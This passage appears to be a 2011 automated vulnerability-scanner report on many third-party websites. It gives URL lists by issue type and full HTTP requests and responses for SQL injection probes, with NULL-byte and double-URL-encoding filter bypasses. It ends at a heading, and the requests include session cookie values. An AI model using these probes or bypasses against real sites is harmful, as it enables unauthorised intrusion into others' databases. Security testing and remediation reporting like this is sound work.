19.42. http://www.yadvertisingblog.com/blog/wp-content/themes/yahooexchangeblog/images/favicon.png

19.43. http://www.yadvertisingblog.com/blog/wp-content/themes/yahooexchangeblogimages/img_topbar_arrow.gif

20. File upload functionality

21. TRACE method is enabled

21.1. http://chartupload.com/

21.2. http://cheetah.vizu.com/

21.3. http://puma.vizu.com/

21.4. http://secure-us.imrworldwide.com/

21.5. http://tm.verticalacuity.com/

21.6. http://tracking.hubspot.com/

21.7. http://www.aboutads.info/

22. Email addresses disclosed

22.1. https://buy.wsj.com/shopandbuy/order/subscribe.jsp

22.2. http://chartupload.com/source/includes/scripts/jquery.dimensions.js

22.3. http://chartupload.com/source/includes/scripts/phpjs_00029.js

22.4. http://l.yimg.com/g/javascript/fold_main.js.v48851.48851.48851.48851.48851.38771.48851.48851.104404.84182.86949.86949.62864.38771.66362.84183.84152.69832.38771.84694.38771.88197.84182.98826.98920.99014.18

22.5. http://l.yimg.com/g/javascript/s_output_en-us.js.057250ace985d60a3bcf49f9653a6eca

22.6. https://login.yahoo.com/config/login

22.7. http://members.pega.com/common/js/jquery/plugins/jquery.callback.js

22.8. http://members.pega.com/common/js/jquery/plugins/jquery.cookie.js

22.9. http://members.pega.com/common/js/jquery/plugins/jquery.dimensions.js

22.10. http://s.gravatar.com/js/jquery.Jcrop.js

22.11. http://sj.wsj.net/djscript/bucket/NA_WSJ/page/0_0_WA_0002/provided/j_global_slim/version/20110602184226.js

22.12. http://sj.wsj.net/djscript/require/j_global_slim/version/20110611110639.js

22.13. http://sj.wsj.net/djscript/require/j_global_slim/version/20110613193701.js

22.14. http://us.havaianas.com/scripts/scriptaculous/controls.js

22.15. http://us.havaianas.com/scripts/scriptaculous/dragdrop.js

22.16. http://videopress.com/osd.xml

22.17. http://widgets3.flux.com/Widget/Comments/3024/en-US

22.18. http://windows.microsoft.com/Scripts/3.1/s_code.js

22.19. http://www.mtv.com/

22.20. http://www.pega.com/community/groups/pega-developer-network-pdn

23. Private IP addresses disclosed

23.1. http://static.ak.facebook.com/connect.php/en_US/css/bookmark-button-css/connect-button-css/share-button-css/FB.Connect-css/connect-css

23.2. http://static.ak.facebook.com/connect.php/en_US/js/Api/CanvasUtil/Connect/XFBML

23.3. http://static.ak.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US

23.4. http://static.ak.fbcdn.net/connect/xd_proxy.php

23.5. http://static.ak.fbcdn.net/images/fbconnect/login-buttons/connect_light_medium_long.gif

23.6. http://static.ak.fbcdn.net/images/fbconnect/login-buttons/connect_light_small_short.gif

23.7. http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/jUmyEs5927-.css

23.8. http://static.ak.fbcdn.net/rsrc.php/v1/yf/r/uzHjjRskdHc.js

23.9. http://www.facebook.com/extern/login_status.php

23.10. http://www.facebook.com/extern/login_status.php

23.11. http://www.facebook.com/extern/login_status.php

23.12. http://www.facebook.com/plugins/fan.php

23.13. http://www.facebook.com/plugins/like.php

23.14. http://www.facebook.com/plugins/like.php

23.15. http://www.facebook.com/plugins/like.php

23.16. http://www.facebook.com/plugins/like.php

23.17. http://www.facebook.com/plugins/like.php

23.18. http://www.facebook.com/plugins/like.php

23.19. http://www.facebook.com/plugins/like.php

23.20. http://www.facebook.com/plugins/like.php

23.21. http://www.google.com/sdch/vD843DpA.dct

23.22. http://www.mtv.com/videos/lite/desktop/js/lib.jhtml

24. Social security numbers disclosed

25. Robots.txt file

25.1. http://0.gravatar.com/avatar/ec595f306c9ab9861b31f653da65bf5a

25.2. http://1.gravatar.com/avatar/1404aa006cbd4ccf1e1969ff0ed8d2d3

25.3. http://2.gravatar.com/avatar/c63392ca320086522cf4d55cbf1d3808

25.4. http://a.analytics.yahoo.com/p.pl

25.5. http://a.tribalfusion.com/j.ad

25.6. http://ad.doubleclick.net/adi/N447.153730.YAHOO.COM/B5548365.27

25.7. http://ad.yieldmanager.com/st

25.8. http://ads.bluelithium.com/pixel

25.9. http://ads.pointroll.com/PortalServe/

25.10. http://advertising.yahoo.com/favicon.ico

25.11. http://advertisingcentral.yahoo.com/

25.12. http://api.bizographics.com/v1/profile.json

25.13. http://api.twitter.com/1/dallasmavs/lists/mavs-insiders/statuses.json

25.14. http://aux1.forexfactory.com/www/delivery/ai.php

25.15. http://b.scorecardresearch.com/beacon.js

25.16. http://b.voicefive.com/p

25.17. http://bs.serving-sys.com/BurstingPipe/adServer.bs

25.18. http://cheetah.vizu.com/a.gif

25.19. http://cm.mtv.overture.com/js_flat_1_0/

25.20. http://d3.zedo.com/jsc/d3/ff2.html

25.21. http://d7.zedo.com/img/d3/x.gif

25.22. http://ds.serving-sys.com/BurstingCachedScripts//SBTemplates_2_3_2/StdBanner.js

25.23. http://en.gravatar.com/

25.24. http://en.search.wordpress.com/opensearch.xml

25.25. http://en.wordpress.com/signup/

25.26. https://en.wordpress.com/signup/

25.27. http://farm1.static.flickr.com/70/buddyicons/11988005@N00.jpg

25.28. http://farm2.static.flickr.com/1311/buddyicons/29208959@N03.jpg

25.29. http://farm3.static.flickr.com/2157/buddyicons/12951874@N00.jpg

25.30. http://farm4.static.flickr.com/3023/buddyicons/41047258@N00.jpg

25.31. http://farm5.static.flickr.com/4002/buddyicons/14646162@N03.jpg

25.32. http://farm6.static.flickr.com/5091/buddyicons/60432067@N07.jpg

25.33. http://feeds.bbci.co.uk/news/rss.xml

25.34. http://fls.doubleclick.net/activityi

25.35. http://go.microsoft.com/fwlink/

25.36. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1052525703/

25.37. http://i0.poll.fm/js/production/public-home.js

25.38. http://imx.mtv.com/sitewide/droplets/view_gen.jhtml

25.39. http://js.microsoft.com/library/svy/windows/broker-config.js

25.40. http://l.addthiscdn.com/live/t00/250lo.gif

25.41. http://m1.zedo.com/log/p.gif

25.42. http://mswindowswolglobal.112.2o7.net/b/ss/mswindowswolglobal,mswindowswolenus,mswindowswol2dev,mswindowswoldev/1/H.17/s25014962418936

25.43. http://mtv.mtvnimages.com/uri/mgid:uma:video:mtv.com:659840

25.44. http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml

25.45. http://now.eloqua.com/visitor/v200/svrGP.asp

25.46. http://om.dowjoneson.com/b/ss/djglobal,djwsj/1/H.20.3/s26861636964604

25.47. http://online.wsj.com/static_html_files/jsframe.html

25.48. http://p.opt.fimserve.com/bht/

25.49. http://pixel.quantserve.com/pixel/p-3aud4J6uA4Z6Y.gif

25.50. http://puma.vizu.com/cdn/00/00/21/00/smart_tag.js

25.51. http://s.gravatar.com/js/jquery.Jcrop.js

25.52. http://s0.wp.com/wp-content/themes/h4/style.css

25.53. http://s1.wp.com/wp-content/themes/h4/js/scripts.js

25.54. http://s2.wp.com/imgpress

25.55. http://s7.addthis.com/js/250/addthis_widget.js

25.56. http://spd.pointroll.com/PointRoll/Ads/PRScript.dll

25.57. http://spe.atdmt.com/ds/UXULASONYSPE/Bad_Teacher/bt_728x90_date.jpg

25.58. http://speed.pointroll.com/PointRoll/Media/Banners/Wrigley/866687/cp_backup_728x90.jpg

25.59. http://static.ak.fbcdn.net/connect/xd_proxy.php

25.60. http://t.pointroll.com/PointRoll/Track/

25.61. http://tcr.tynt.com/javascripts/Tracer.js

25.62. http://tm.verticalacuity.com/vat/visitT

25.63. http://us.adserver.yahoo.com/a

25.64. http://us.bc.yahoo.com/b

25.65. http://us.havaianas.com/MYOH.html

25.66. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s94813384910564

25.67. http://videopress.com/

25.68. http://www.aboutads.info/modules/book/book.css

25.69. http://www.alexa.com/

25.70. http://www.bizographics.com/collect/

25.71. http://www.facebook.com/extern/login_status.php

25.72. http://www.flickr.com/apps/badge/badge_iframe.gne

25.73. http://www.google-analytics.com/__utm.gif

25.74. http://www.googleadservices.com/pagead/conversion/1052525703/

25.75. http://www.microsoft.com/ie

25.76. http://www.mtv.com/favicon.ico

25.77. http://www.pega.com/

26. Cacheable HTTPS response

26.1. https://buy.wsj.com/shopandbuy/order/subscribe.jsp

26.2. https://en.wordpress.com/lang-guess-ajax.php

26.3. https://en.wordpress.com/signup/

27. HTML does not specify charset

27.1. http://ad.doubleclick.net/adi/N1558.66.ALEXAINTERNET/B4971267

27.2. http://ad.doubleclick.net/adi/N447.153730.YAHOO.COM/B5548365.27

27.3. http://ad.doubleclick.net/adi/N5155.152847.2342166290621/B5116932.9

27.4. http://ad.doubleclick.net/adi/N5621.66.2412875475321/B4682155

27.5. http://ad.doubleclick.net/adi/brokerbuttons.wsj.com/us_subscriber

27.6. http://ad.doubleclick.net/adi/interactive.wsj.com/tech_front

27.7. http://ad.doubleclick.net/adi/interactive.wsj.com/tech_main_story

27.8. http://ad.doubleclick.net/adi/mtv.mtvi/atf_i_s/mv/videos/mike-taylor/_659420/perfect

27.9. http://ad.doubleclick.net/adi/mtv.mtvi/btf_i_s/mv/videos/mike-taylor/_659420/perfect

27.10. http://ad.doubleclick.net/adi/mtv.mtvi/survey

27.11. http://ads.pointroll.com/PortalServe/

27.12. http://bs.serving-sys.com/BurstingPipe/adServer.bs

27.13. http://d3.zedo.com/jsc/d3/ff2.html

27.14. http://fls.doubleclick.net/activityi

27.15. http://fluxstatic.com/favicon.ico

27.16. http://now.eloqua.com/visitor/v200/svrGP.asp

27.17. http://platform.twitter.com/widgets/follow_button.html

27.18. http://platform0.twitter.com/widgets/follow_button.html

27.19. http://static0.fluxstatic.com/favicon.ico

27.20. http://www.burstnet.com/cgi-bin/ads/ad21868k.cgi/v=2.3S/sz=728x90A/55035/NF/RETURN-CODE/JS/

27.21. http://www.burstnet.com/cgi-bin/ads/ad21868v.cgi/v=2.3S/sz=728x90A/31221/NF/RETURN-CODE/JS/

27.22. http://www.burstnet.com/cgi-bin/ads/ad21868w.cgi/v=2.3S/sz=300x250A/NZ/54723/NF/RETURN-CODE/JS/

27.23. http://www.burstnet.com/cgi-bin/ads/ad21868w.cgi/v=2.3S/sz=728x90A/92519/NF/RETURN-CODE/JS/

27.24. http://www.livewithoscar.com/favicon.ico

27.25. http://www.livewithoscar.com/images/misc/calendar_impact_high.gif

27.26. http://www.livewithoscar.com/images/misc/calendar_impact_low.gif

27.27. http://www.livewithoscar.com/images/misc/calendar_impact_medium.gif

27.28. http://www.livewithoscar.com/images/misc/nonec.gif

27.29. http://www.mtv.com/games/arcade/game/play.jhtml

27.30. http://www.mtv.com/global/music/modules/followUs/js/home.jhtml

27.31. http://www.mtv.com/global/music/scripts/includes/geo.jhtml

27.32. http://www.mtv.com/global/scripts/special/projx.jhtml

27.33. http://www.mtv.com/xd_flux.html

27.34. http://www.pega.com/welcome-info-ajax.php

28. Content type incorrectly stated

28.1. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1307974284**

28.2. http://api.twitter.com/1/dallasmavs/lists/mavs-insiders/statuses.json

28.3. http://api.twitter.com/1/fansided/lists/fansided-nba/statuses.json

28.4. http://bs.serving-sys.com/BurstingPipe/adServer.bs

28.5. http://catrg.peer39.net/301/358/2034929301

28.6. http://community.mtv.com/Overlays/LogIn.aspx

28.7. http://cs.wsj.net/community/content/images/misc/groups/industriesrolodex.80x80.png

28.8. http://cs.wsj.net/community/content/images/misc/groups/otherquestionmark.25x25.png

28.9. http://cs.wsj.net/community/content/images/misc/members/defaultuser.50x50.png

28.10. http://d.yimg.com/ce/soup/soup_generated_fragment.gne

28.11. http://fluxstatic.com/favicon.ico

28.12. http://l.apture.com/v3/

28.13. http://now.eloqua.com/visitor/v200/svrGP.asp

28.14. http://online.wsj.com/public/page/0_0_WC_HeaderWeather-10005.html

28.15. http://pglb.buzzfed.com/63975/17983acd3149cc7b59eebf3385392137

28.16. http://s2.wp.com/mshots/v1/http%3A%2F%2Fbengunby.wordpress.com%2F2011%2F06%2F13%2Fits-not-wrong-to-be-happy-lebron-james-lost%2F

28.17. http://spd.pointroll.com/PointRoll/Ads/PRScript.dll

28.18. http://static0.fluxstatic.com/favicon.ico

28.19. http://us.havaianas.com/scripts/jquery/jquery.bgiframe.min.js

28.20. http://www.burstnet.com/cgi-bin/ads/ad21868k.cgi/v=2.3S/sz=728x90A/55035/NF/RETURN-CODE/JS/

28.21. http://www.burstnet.com/cgi-bin/ads/ad21868v.cgi/v=2.3S/sz=728x90A/31221/NF/RETURN-CODE/JS/

28.22. http://www.burstnet.com/cgi-bin/ads/ad21868w.cgi/v=2.3S/sz=300x250A/NZ/54723/NF/RETURN-CODE/JS/

28.23. http://www.burstnet.com/cgi-bin/ads/ad21868w.cgi/v=2.3S/sz=728x90A/92519/NF/RETURN-CODE/JS/

28.24. http://www.facebook.com/extern/login_status.php

28.25. http://www.flickr.com/fragment.gne

28.26. http://www.forexfactory.com/favicon.ico

28.27. http://www.livewithoscar.com/CuteSoft_Client/CuteEditor/Load.ashx

28.28. http://www.mtv.com/global/music/images/WDK3/btn-add-to-favorites.jpg

28.29. http://www.mtv.com/global/music/modules/followUs/js/home.jhtml

28.30. http://www.mtv.com/global/music/scripts/includes/geo.jhtml

28.31. http://www.mtv.com/global/scripts/special/projx.jhtml

28.32. http://www.mtv.com/shared/promoimages/bands/a/a_day_to_remember/push/mini_banner//239x90.jpg

28.33. http://yadvertisingblog.app3.hubspot.com/salog.js.aspx

29. Content type is not specified



1. SQL injection
There are 13 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://ad.doubleclick.net/adj/interactive.wsj.com/tech_main_story [;page parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adj/interactive.wsj.com/tech_main_story

Issue detail

The ;page parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ;page parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /adj/interactive.wsj.com/tech_main_story;;page=article;msrc=WSJ_Tech_LEADTop;biz=1080;biz=1027;biz=1053;;p39=220;p39=239;p39=227;s=8_10004;s=8_10009;s=8_10016;s=8_10017;s=8_10001;mc=b2pfreezone;tile=5;sz=336x280,300x250;ord=8210821082108210;%00' HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/static_html_files/jsframe.html?jsuri=http://ad.doubleclick.net/adj/interactive.wsj.com/tech_main_story;;page=article;msrc=WSJ_Tech_LEADTop;biz=1080;biz=1027;biz=1053;;p39=220;p39=239;p39=227;s=8_10004;s=8_10009;s=8_10016;s=8_10017;s=8_10001;mc=b2pfreezone;tile=5;sz=336x280,300x250;ord=8210821082108210;
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6959
Date: Tue, 14 Jun 2011 00:14:51 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu May 26 09:23:24 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
h"];if(x && x.description){var pVF=x.description;var y=pVF.indexOf("Flash ")+6;pVM=pVF.substring(y,pVF.indexOf(".",y));}}
else if (window.ActiveXObject && window.execScript){
window.execScript('on error resume next\npVM=2\ndo\npVM=pVM+1\nset swControl = CreateObject("ShockwaveFlash.ShockwaveFlash."&pVM)\nloop while Err = 0\nOn Error Resume Next\npVM=pVM-1\nSub '+DCid+'_FSCommand(ByVal command, ByVal
...[SNIP]...

Request 2

GET /adj/interactive.wsj.com/tech_main_story;;page=article;msrc=WSJ_Tech_LEADTop;biz=1080;biz=1027;biz=1053;;p39=220;p39=239;p39=227;s=8_10004;s=8_10009;s=8_10016;s=8_10017;s=8_10001;mc=b2pfreezone;tile=5;sz=336x280,300x250;ord=8210821082108210;%00'' HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/static_html_files/jsframe.html?jsuri=http://ad.doubleclick.net/adj/interactive.wsj.com/tech_main_story;;page=article;msrc=WSJ_Tech_LEADTop;biz=1080;biz=1027;biz=1053;;p39=220;p39=239;p39=227;s=8_10004;s=8_10009;s=8_10016;s=8_10017;s=8_10001;mc=b2pfreezone;tile=5;sz=336x280,300x250;ord=8210821082108210;
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 1489
Date: Tue, 14 Jun 2011 00:14:52 GMT

document.write('<script src=\"http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2344415&PluID=0&w=300&h=250&ord=3195412&ifrm=1&ucm=true&ifl=$$/static_html_files/addineyeV2.html$$&ncu=
...[SNIP]...

1.2. http://js.microsoft.com/library/svy/windows/broker-config.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://js.microsoft.com
Path:   /library/svy/windows/broker-config.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /library/svy'%20and%201%3d1--%20/windows/broker-config.js?1308011696285 HTTP/1.1
Host: js.microsoft.com
Proxy-Connection: keep-alive
Referer: http://windows.microsoft.com/en-US/internet-explorer/downloads/ie-9/worldwide-languages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; msdn=L=1033; WT_NVR_RU=0=msdn:1=:2=; WT_NVR=0=/:1=library:2=library/svy42058680'%20or%201%3d1--%20:3=library/svy42058680'%20or%201%3d1--%20/sto; mcI=Thu, 09 Jun 2011 16:24:17 GMT; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=11779L002j13n0002g10103; ixpLightBrowser=0; _vis_opt_s=1%7C; R=200024632-6/4/2011 17:55:19; s_nr=1307360954509-Repeat; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=06/06/2011 11:52:41&Microsoft.VisitStartDate=06/06/2011 11:52:41&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=23&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1307350365395:ss=1307350365395; MS0=52319cad089b46ffaf7cb2f75a658057; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 404 Not Found
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
VTag: 438673600500000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Content-Length: 23620
Cache-Control: no-cache
Expires: Tue, 14 Jun 2011 00:36:52 GMT
Date: Tue, 14 Jun 2011 00:36:52 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en"lang="en"><he
...[SNIP]...
<!--CPUMeter: Total CPU: 00:00:00.0936006, User CPU: 00:00:00.0780005, Priv CPU: 00:00:00.0156001, Elapsed: 00:00:04.5708000, Usage: 0.0204779469677081 -->

</body></html>

Request 2

GET /library/svy'%20and%201%3d2--%20/windows/broker-config.js?1308011696285 HTTP/1.1
Host: js.microsoft.com
Proxy-Connection: keep-alive
Referer: http://windows.microsoft.com/en-US/internet-explorer/downloads/ie-9/worldwide-languages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; msdn=L=1033; WT_NVR_RU=0=msdn:1=:2=; WT_NVR=0=/:1=library:2=library/svy42058680'%20or%201%3d1--%20:3=library/svy42058680'%20or%201%3d1--%20/sto; mcI=Thu, 09 Jun 2011 16:24:17 GMT; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=11779L002j13n0002g10103; ixpLightBrowser=0; _vis_opt_s=1%7C; R=200024632-6/4/2011 17:55:19; s_nr=1307360954509-Repeat; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=06/06/2011 11:52:41&Microsoft.VisitStartDate=06/06/2011 11:52:41&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=23&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1307350365395:ss=1307350365395; MS0=52319cad089b46ffaf7cb2f75a658057; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 404 Not Found
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
VTag: 438328700300000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Content-Length: 23579
Cache-Control: no-cache
Expires: Tue, 14 Jun 2011 00:36:52 GMT
Date: Tue, 14 Jun 2011 00:36:52 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en"lang="en"><he
...[SNIP]...
<!--CPUMeter: Total CPU: 00:00:00, User CPU: 00:00:00, Priv CPU: 00:00:00, Elapsed: 00:00:00.5304000, Usage: 0 -->

</body></html>

1.3. http://l.apture.com/v3/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://l.apture.com
Path:   /v3/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 18030734'%20or%201%3d1--%20 and 18030734'%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /v3/?4=%7B%22pageId%22%3A343348986%2C%22visitId%22%3A23247798873571%2C%22duration%22%3A12219328%2C%22numLinks%22%3A0%2C%22numLinksOpened%22%3A0%2C%22durationPopupsOpened%22%3A0%2C%22numTmmLinks%22%3A0%2C%22type%22%3A1025%2C%22siteId%22%3A79096%7D&AC=s4te21hWKP&118030734'%20or%201%3d1--%20=1 HTTP/1.1
Host: l.apture.com
Proxy-Connection: keep-alive
Referer: http://tunedin.blogs.time.com/2011/06/13/game-of-thrones-watch-its-all-in-the-execution-2/
Origin: http://tunedin.blogs.time.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 500 Error
Content-Type: text/javascript
Content-Length: 2
Date: Mon, 13 Jun 2011 14:42:58 GMT
Connection: close

{}

Request 2

GET /v3/?4=%7B%22pageId%22%3A343348986%2C%22visitId%22%3A23247798873571%2C%22duration%22%3A12219328%2C%22numLinks%22%3A0%2C%22numLinksOpened%22%3A0%2C%22durationPopupsOpened%22%3A0%2C%22numTmmLinks%22%3A0%2C%22type%22%3A1025%2C%22siteId%22%3A79096%7D&AC=s4te21hWKP&118030734'%20or%201%3d2--%20=1 HTTP/1.1
Host: l.apture.com
Proxy-Connection: keep-alive
Referer: http://tunedin.blogs.time.com/2011/06/13/game-of-thrones-watch-its-all-in-the-execution-2/
Origin: http://tunedin.blogs.time.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Content-Type: text/javascript
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST
Access-Control-Max-Age: 604800
Content-Length: 2
Date: Mon, 13 Jun 2011 14:42:58 GMT
Connection: close

{}

1.4. http://om.dowjoneson.com/b/ss/djglobal,djwsj/1/H.20.3/s22808814137242 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://om.dowjoneson.com
Path:   /b/ss/djglobal,djwsj/1/H.20.3/s22808814137242

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

